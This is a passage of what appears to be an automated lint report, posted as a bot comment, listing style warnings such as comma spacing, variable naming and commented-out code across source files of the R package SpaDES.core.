^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, 